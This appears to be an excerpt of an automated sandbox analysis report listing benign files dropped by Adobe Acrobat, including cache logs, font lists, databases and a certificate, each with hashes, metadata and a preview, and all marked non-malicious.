                                              SHA1:3F8D3E8F28B23A6B35794C01CDCCFA30665C3992
                                              SHA-256:9C9FDF850473DB83CF846F16B6D889ABECB6612B5CAF047FD982A650D41591FC
                                              SHA-512:B2293EBD3B554697667E9F2D9722C7BA93CB7D71AEE0B6459B6EAF6BC01F65DCCDD07DDA0DE2934FAAB45370455897911B60AAC12505A2335AE74D3AA50A1063
                                              Malicious:false
                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380630255579843","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":122642},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4320
                                              Entropy (8bit):5.258104955828006
                                              Encrypted:false
                                              SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo702xBjnJ:etJCV4FiN/jTN/2r8Mta02fEhgO73goD
                                              MD5:545C1177026501417634A01268AE9409
                                              SHA1:66D5AB31B2343127668A39BD160EF121CC471F70
                                              SHA-256:BC8FAD3F6C41A79A0B11CC9A83F264813AEFCB25BD920B2814CEA299C9AF2500
                                              SHA-512:47F58B190FA9BAEDCBD1871B8CB01CE44E819139065B360C4BF434C6BD4C5432D0F8ADF3348C248A24067ADDD7572803D9878B0A2A79FA31C4E4EF4B4953A17A
                                              Malicious:false
                                              Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):324
                                              Entropy (8bit):5.236319907358879
                                              Encrypted:false
                                              SSDEEP:6:iOH1iLih+q2Pwkn2nKuAl9OmbzNMxIFUtt1iLNXZmwD1iLshVkwOwkn2nKuAl9Ob:71svYfHAa8jFUtiX//5JfHAa84J
                                              MD5:AD1E62AAB1B0D3E989650472B20BBA6C
                                              SHA1:7EF8A30D4072883A8BEE21E05CE99158253184AA
                                              SHA-256:25277756F73945231DCA2216EBDC66A8DEB40029D091E1D803471F0594F367C9
                                              SHA-512:94A75CFAE2B03AD402D84A0CA429405C04D3D79C5E97C546467CD059AA9104E71F8562A17106D8E44253B4FC1BCBD514676A6267B02E358B4B45E3799904B393
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.656 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/05-04:44:03.657 1d98 Recovering log #3.2025/01/05-04:44:03.658 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):324
                                              Entropy (8bit):5.236319907358879
                                              Encrypted:false
                                              SSDEEP:6:iOH1iLih+q2Pwkn2nKuAl9OmbzNMxIFUtt1iLNXZmwD1iLshVkwOwkn2nKuAl9Ob:71svYfHAa8jFUtiX//5JfHAa84J
                                              MD5:AD1E62AAB1B0D3E989650472B20BBA6C
                                              SHA1:7EF8A30D4072883A8BEE21E05CE99158253184AA
                                              SHA-256:25277756F73945231DCA2216EBDC66A8DEB40029D091E1D803471F0594F367C9
                                              SHA-512:94A75CFAE2B03AD402D84A0CA429405C04D3D79C5E97C546467CD059AA9104E71F8562A17106D8E44253B4FC1BCBD514676A6267B02E358B4B45E3799904B393
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.656 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/05-04:44:03.657 1d98 Recovering log #3.2025/01/05-04:44:03.658 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250105094408Z-192.bmp

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                              Category:dropped
                                              Size (bytes):65110
                                              Entropy (8bit):1.509136818917381
                                              Encrypted:false
                                              SSDEEP:192:wwlGGq1dW6NCa1OPqelE1ts+auKoWAAO3FElU4b+BypmLw:wwUGq1dW6n1OCelE1tsluK+AjH
                                              MD5:EDD209DE2EDD7F26F87A3485484C2978
                                              SHA1:946CB732908578FCDAA4900B6D85BB5268C854C0
                                              SHA-256:BD4394D6C254AD60BB20FC6F8EDFBB256E7131F0CAB9CAED9C9D0E6284ABCF8C
                                              SHA-512:DF9E3FE8C672011478416A35C740AC1C7FF3BF80D7AE760519162C2F211D4576591907872A20E598D73CAE7C888A4CBFF19615D610BF09BBF24C61C2C1FD4CAA
                                              Malicious:false
                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
                                              Category:dropped
                                              Size (bytes):86016
                                              Entropy (8bit):4.445217613608404
                                              Encrypted:false
                                              SSDEEP:384:SeHci5t2iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:/5s3OazzU89UTTgUL
                                              MD5:89F4A5350D8DA0E1F819D14C7DF93E87
                                              SHA1:8FF713707E21A2C2F01300BC8511CF60D6733AE9
                                              SHA-256:F7001B899CC900928CF9807EAB1C6CF3F4BFD951041D63F68F458BE71CE9E63A
                                              SHA-512:C2D0C359A57A3C5E55C53AA861AF0FC9A2C93974D40A13B0E8F8D5C5AA60D101374E0836152AF5D3A3B8DB30C968A28565C35B21D36200EFC4FDFE99861DDC59
                                              Malicious:false
                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite Rollback Journal
                                              Category:dropped
                                              Size (bytes):8720
                                              Entropy (8bit):2.214354338041627
                                              Encrypted:false
                                              SSDEEP:24:7+tr/94nuwKCfqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmQ:7MjenC+qvmFTIF3XmHjBoGGR+jMz+Lhg
                                              MD5:01CE7323EDF5F86E105BC25CC6C8BA83
                                              SHA1:B66CBBB1595787441DD2FA066CDC05AFFBDA79B9
                                              SHA-256:8F902C3E0890DDDB62B3E5277D731D4D7B82FDE4107A9663052DAAD122B8E9AD
                                              SHA-512:8A8FAB5DCD9E9286B34E38BBBA5BAE22CF60F530D56E70C95E424063D00CC9AA7FF358547F065C27B12319AF3022F336FB47C2C9CCA1B2DF7C58C6F28C211920
                                              Malicious:false
                                              Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:Certificate, Version=3
                                              Category:dropped
                                              Size (bytes):1391
                                              Entropy (8bit):7.705940075877404
                                              Encrypted:false
                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                              Malicious:false
                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):192
                                              Entropy (8bit):2.7673182398396405
                                              Encrypted:false
                                              SSDEEP:3:kkFklKtrfllXlE/HT8ktl1NNX8RolJuRdxLlGB9lQRYwpDdt:kKTtkT80VNMa8RdWBwRd
                                              MD5:0454815D4013102FBD387830D8F97813
                                              SHA1:A7923935847B37042306416038E868DE8D027B63
                                              SHA-256:861247D6CDEF6557A872C9B10A9A8A59CAE83ECF0D4EF449F7704EC57073FA40
                                              SHA-512:E753F93A12095EECE2A059D5CF7E9CECC5BC0DC8C6F95024A23536C3A2D3046418020AD04B489CE26B19AC24FEF00CC57403E0444B40FF0B3208263E7EBA128C
                                              Malicious:false
                                              Preview:p...... .........HGbV_..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):1233
                                              Entropy (8bit):5.233980037532449
                                              Encrypted:false
                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.2700

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):1233
                                              Entropy (8bit):5.233980037532449
                                              Encrypted:false
                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):1233
                                              Entropy (8bit):5.233980037532449
                                              Encrypted:false
                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):10880
                                              Entropy (8bit):5.214360287289079
                                              Encrypted:false
                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.2700

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):10880
                                              Entropy (8bit):5.214360287289079
                                              Encrypted:false
                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):295
                                              Entropy (8bit):5.370588179406839
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJM3g98kUwPeUkwRe9:YvXKXFJuWkZc0vjGMbLUkee9
                                              MD5:C586C47E378C2F92FF68B26F9F6D9157
                                              SHA1:D46E6C1229C75DDD40B75D4902E6DE1F76A4A7D5
                                              SHA-256:2FA66F20895CC2C3785735BCB01AEB2E64D49EB43F25903E8D144EB2AEE77D34
                                              SHA-512:B8537A1DB3F7D44CBD99D934CBA44ECA26AC42EF374296B1ED427B76631F4237090758D54051EB7EBD19D8DB6819DC3DE42C829ADB4447E867DF20FF8C13EBF4
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):294
                                              Entropy (8bit):5.321825469500053
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfBoTfXpnrPeUkwRe9:YvXKXFJuWkZc0vjGWTfXcUkee9
                                              MD5:4B750D97184584D543E9CB067DF8612A
                                              SHA1:1344B77BAA1F6E7410C397D25FE76D005EE431C9
                                              SHA-256:79ED385449AC217B61B1FE9B7D5461FA979E72FAFF892FC1CD8078A8693EA803
                                              SHA-512:DBF2280BCE5DB6ABA80CB880A0DFDBE76FDBB5E2AF6B1C4C74AE4A187E9486659BEB6DB9FE25C25379FD17B1A87C643B86513E12637068CA62EE2CE539CD77C9
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):294
                                              Entropy (8bit):5.300224788368483
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfBD2G6UpnrPeUkwRe9:YvXKXFJuWkZc0vjGR22cUkee9
                                              MD5:7C752750ADFBF76550E31EC8C37FBE0B
                                              SHA1:5106DDCBB87C2CA039502EAA4DCF96E3757D246A
                                              SHA-256:B2FCD422D692F8788AD01C0547F2DFAAA531F668D33D5DC07B602F1734F04D9D
                                              SHA-512:21A66F300C270A4C4EA23F4BB10FE5F1A9DFBE1708CCD54EED775B71B936A2B5D0D089563DD53D7452F016618209214F1526E09F16CAA607ECC34F6520C87ACF
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):285
                                              Entropy (8bit):5.357852187113916
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfPmwrPeUkwRe9:YvXKXFJuWkZc0vjGH56Ukee9
                                              MD5:78AF5C279973F5CDD669699EDF6275A1
                                              SHA1:B61582B5B752F583509A441B2829E62A22667B37
                                              SHA-256:F9CDCBC0D06E6DA4D678DD97430A08B742BC1589DC79452E20019D02F31B8059
                                              SHA-512:EC9F056F3856C67C7755EE021838AC54242CA50CB8E03E170EE4FF5C727992F6A70BF71809BDA85BFE5C70944E0619540257A7422CD2445718CD05446890729C
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1123
                                              Entropy (8bit):5.6888550626998
                                              Encrypted:false
                                              SSDEEP:24:Yv6XPunzv4pLgE9cQx8LennAvzBvkn0RCmK8czOCCS2:YvUYwhgy6SAFv5Ah8cv/2
                                              MD5:65C98FC0D24FF65D99D0A1B63A7D17B0
                                              SHA1:20369738B5DFB0DD89A86A7EDBEA5A3945F5E5B0
                                              SHA-256:FF208406C111EEB5E39209A0ED95BCAD99330C712D4F81015A6329512ACC4CD4
                                              SHA-512:CFDF8559F97CCDDC713C19B4847970A5F2F0A514C89AD1498EC882AF6DCFA3FB97C736E2E512DB1A7653DC002AF3355077C1035412A6CE38837016DA804CB7F6
                                              Malicious:false
